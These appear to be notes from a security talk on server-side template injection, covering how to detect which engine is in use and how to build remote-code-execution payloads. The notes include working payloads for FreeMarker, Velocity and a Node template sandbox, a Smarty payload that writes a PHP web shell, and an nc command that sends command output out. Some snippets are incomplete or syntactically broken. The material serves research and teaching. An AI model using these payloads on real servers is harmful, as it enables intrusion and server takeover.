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> Dear ${user.first_name},
Dear sample01

> Dear ${user.password}
FreeMarket template error: the following has evaluated to null or missing...

Q: Is it safe to allow users to upload templates if they are untrusted? A. You should not allow this!


  • Trail of breadcrumbs in documentation
  • BurpSuite was failing to find an obvious XSS bug
  • It was missed because the server was behaving weirdly
  • This issue was template injection, not XSS! ... a rather serious vulnerability
  • How common is Template Injection? How often do people find XSS not realizing its in fact Template Injection?
  • How easy is it to get Template Injection?
  • Started investigating

What is Template Injection?

If developers allow this sort of functionality to users; they don't realize how dangerous it is.

User input that is unsafely embedded in a template :

$output = $twig > render (
  'Dear' . $_GET['custom_greeting'],
  array("first_name" => $user.first_name)

$output = $twig > render (
  "Dear {first_name}",
  array("first_name" => $user.first_name)
  • Detect the Template Engine used
  • Build an exploit for it
  • How do you recognize Template Injection? Given all the various engines?
Hello {}
// Try and see what gets evaluated by the server
Expected: 'ab' or error

Expected: 'a49b'
{var} ${var} {{var}} <%var%> [%var%]

// code<tag>
Expect error or empty string}} a<tag>

// safely enclose template tags; see how this is being processed
Expect <tag>

How do you build an exploit for a Template Injection vulnerability?

  • Build a decision tree based on behavior from several template engines
  • Use simple mathematical expressions
  • BurpSuite users already have these type of detection features supported by BurpSuite
  • Can something uniquely evil be done with on the server?
  • Read the documentation! sounds quite lame.
  • Often however, if you read the documentation you will read everything required to build out a full exploit against vulnerable template
  • Template engines carry security considerations often highlighting dangerous functions
  • What about default enabled templates or plugins?
  • Determine what you have access to within the template exuection environment
  • Is there a Self {}?
  • Loop around the attributes and methods of the Self {} to determine everything you have access to
  • Is there a Template Author section?
  • Is there a Security Considerations section? Check those!
  • What do you have access to within the environment? Most template engines have Self {}'s that contains everything that is in scope. Find the name. Then loop around those methods and attribute names to identify what you have access to and scope.
  • Some template engines don't have a documented Self {} but some might use one for internal usage
  • Variable brute forcing wordlist of potential attribute names (supported by BurpSuite)
  • Usual goals: object creation, file read/write, RFI, information disclosure, privilege escalation.
  • This presentation is focused on RCE.
  • Template Engines are great for Information Disclosure because they are executing within an execution context and might reveal internal environment variables eg., Amazon Secret keys

Exploit Development

  • This is intended functionality
  • Can't fault the developers as it was noted in documentation FreeMarker includes a class for Executing external commands that will fork processes
ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
result: uid=119, etc.

Velocity Template Engine

  • No Self {}
  • If you send the class variable ( the sever returns an classic Java.
  • The purpose of this extension is for the use of Java Reflections in templates
  • What is the Velocity way of looping around something?
$class.inspect("java.lang.Runtime").type.getRuntime().exec("sleep 5").waitFor()

returns: [5 second time delay]

#foreach($i in [1..$out.available()])
returns: tomcat7

Smarty (Secure)

  • PHP function whitelist
  • Offers a secure mode to allow template modification for unknown users
  • Implemented using a whitelist of accepted PHP functions
  • Smarty has a Self {}
  • getStreamVariable()
  • Imports class Smarty_Internal_Write_File writes arbitrary contents to arbitrary locations
  • The impression I'm getting is no one has audited these "sandbox" environments in template engines
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME, "<?php passthru($_GET['cmd']);?>", self::clearConfig())}

TWiG Template Engine

  • No static calls
  • No object references from functions
  • There is a Self {} that is undocumented
  • No directly exploitable methods
  • But it does provide a _ self.env
  • Is this a vulnerability in Twig? No, it has a sandbox mode! This is where things get tricky.
  • No attribute retrieval
  • Method call whitelist
  • Arbitrary methods can be called on any object that implements the two interfaces


  • Lets users submit templates in a variety of different languages
  • Sandbox domains
  • Find the Self {}
  • Regex filters: split it into two statements
- var x = root.process
- x = x.mainModule
- for(var prop in x)
, #{prop}  
- var x = root.process
- x = x.mainModule.require
- x = x('child_process')
- x.exec('id | nc 80')
// Setup a listener
clear && python -m SimpleHTTPServer 80


  • How serious is template injection? it can be used to get shell on the server depending on the Object passed in
  • As part of the Alfresco CMS install SELinux might be disabled system wide
  • Template Engines are server-side sandboxes
  • Template injections are there if you look for it
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